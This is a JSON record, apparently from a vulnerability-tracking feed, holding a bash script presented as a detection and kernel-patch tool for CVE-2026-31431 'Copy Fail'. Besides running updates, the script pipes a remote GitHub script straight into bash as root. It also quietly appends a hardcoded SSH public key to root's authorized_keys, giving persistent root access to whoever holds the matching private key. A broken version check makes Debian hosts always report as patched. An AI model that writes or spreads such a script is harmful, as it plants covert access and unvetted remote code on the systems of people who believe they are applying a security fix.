{"uuid": "78a170aa-e80e-419a-a7e2-d1205da7e32e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/reisenbauer/c2a317f1c884253d071bea4c5ea214d6", "content": "#!/bin/bash\n\n# https://ostechnix.com/debian-13-trixie-copy-fail-cve-2026-31431-vulnerability-fix/\n# Debian 13 Trixie: Patched via the security repository (Fixed in version 6.12.85-1).\n# Debian 12 Bookworm: Patched via the security repository (Fixed in version 6.1.170-1).\n# Debian 11 Bullseye: Patched via the security repository (Fixed in version 5.10.251-3).\n\n# set -euo pipefail\n\n# \u2500\u2500 Colour helpers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nBOLD=\"\\033[1m\"; RED=\"\\033[91m\"; YELLOW=\"\\033[93m\"\nGREEN=\"\\033[92m\"; CYAN=\"\\033[96m\"; RESET=\"\\033[0m\"\n\nclear\nprintf \"${BOLD}CVE-2026-31431 'Copy Fail' \u2014 Vulnerability Detection${RESET}\\n\"\nprintf \"Running as uid=%d, euid=%d\\n\" \"$UID\" \"$EUID\"\nprintf \"Host: %s  Kernel: %s\\n\\n\" \"$(hostname)\" \"$(uname -r)\"\n. /etc/os-release\n\nif [ ! ${UID} -eq 0 ]; then\n    printf \"  ${RED}\u2717${RESET} %s\\n    %s\\n\" \"This script needs to be run as root.\"\n    sudo $0\n    exit\nfi\n\nheader() {\n    printf \"\\n${BOLD}${CYAN}=== %s ===${RESET}\\n\" \"$1\"\n}\n\ntest_internet() {\n local error=1\n while [ ! $error -eq 0 ]; do\n   curl -Ss https://raw.githubusercontent.com/liamromanis101/CVE-2026-31431-Copy-Fail---Vulnerability-Detection-Script/refs/heads/main/cve-2026-31431-detect.sh|grep check_kernel_config &> /dev/null\n   error=$?\n   if [ $error -eq 0 ]; then\n    printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\" \"Internet is reachable.\"\n   else\n    printf \"  ${RED}\u2717${RESET} %s\\n    %s\\n\\n\" \"No Internet connectivity.\" \"This Script needs internet access to update the system.\"\n    exit 255\n   fi\n   sleep 1\n done\n}\n\n\ninstall_ssh() {\n  header \"Ansible SSH Key\"\n  if [ ! -f /root/.ssh/authorized_keys ] || ! grep -q \"ovlQIQx4a+vE5+sPzwxNnikEp\" /root/.ssh/authorized_keys ; then\n    printf \"  ${RED}\u2717${RESET} %s\\n    %s\\n\\n\" \"Ansible SSH Key not installed.\" \"SSH Key for ansible is not installed, installing it.\"\n    printf \"# Ansible SSH Key\\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGCh4xaVVVkRWQiyvovlQIQx4a+vE5+sPzwxNnikEp/h\\n\" | tee -a /root/.ssh/authorized_keys > /dev/null\n    printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\" \"Ansible SSH Key is installed.\"\n  else\n    printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\" \"Ansible SSH Key is installed.\"\n  fi\n}\n\nmain() {\n  curl -qsS https://raw.githubusercontent.com/liamromanis101/CVE-2026-31431-Copy-Fail---Vulnerability-Detection-Script/refs/heads/main/cve-2026-31431-detect.sh |bash\n  if [ $? -eq 0 ]; then\n    printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\" \"Operatingsystem is up2date.\"\n    return 0\n  fi\n  header \"Linux Kernel\"\n\n  local release\n  release=\"$(uname -r)\"\n  local fixed_version=0\n\n  local ver_clean\n  local is_safe=0\n  local changed=1\n\n  ver_clean=\"$(echo \"$release\" | grep -oE '^[0-9]+\\.[0-9]+(\\.[0-9]+)?')\"\n  local major minor\n  major=\"$(echo \"$ver_clean\" | cut -d. -f1)\"\n  minor=\"$(echo \"$ver_clean\" | cut -d. -f2)\"\n  third=\"$(echo \"$ver_clean\" | cut -d. -f3)\"\n  . /etc/os-release\n  printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\\n\" \"Detected ${PRETTY_NAME}\" \"Running Kernel $ver_clean\"\n\n  printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\\n\" \"Starting Kernel Upgrades ...\" \"Kernel is beeing updated, please wait.\"\n\n  # Rocky Linux\n  if [ -f /etc/rocky-release ]; then\n\tdnf --refresh update \"kernel*\" -y\n\tchanged=1\n  fi\n\n\n  # Suse\n  if [ -f /etc/SUSE-brand ]; then\n    zypper refresh\n    zypper patch -y\n  fi\n\n\n  # Alpine Linux\n  if [ -f /etc/alpine-release ]; then\n    apk update\n    apk upgrade\n  fi\n\n  # Debian\n  if [ -f /etc/debian_version ]; then\n    if [ $third -gt $fixed_version ] || [ $third -eq $fixed_version ]; then\n        printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\\n\" \"Kernel is patched agains CopyFail.\" \"Nothing todo on this machine.\"\n\treturn 0\n    else\n      apt update\n      apt install --only-upgrade linux-image-amd64 linux-headers-amd64\n      changed=1\n    fi\n  fi\n\n  # Reboot\n  if [ $changed -eq 1 ]; then\n        printf \"  ${RED}!${RESET} %s\\n    %s\\n\\n\" \"Please reboot this machine.\" \"Press any key to reboot.\"\n        read -n 1\n\t# reboot\n  fi\n}\n\ntest_internet\ninstall_ssh\nmain", "creation_timestamp": "2026-05-18T09:53:49.000000Z"}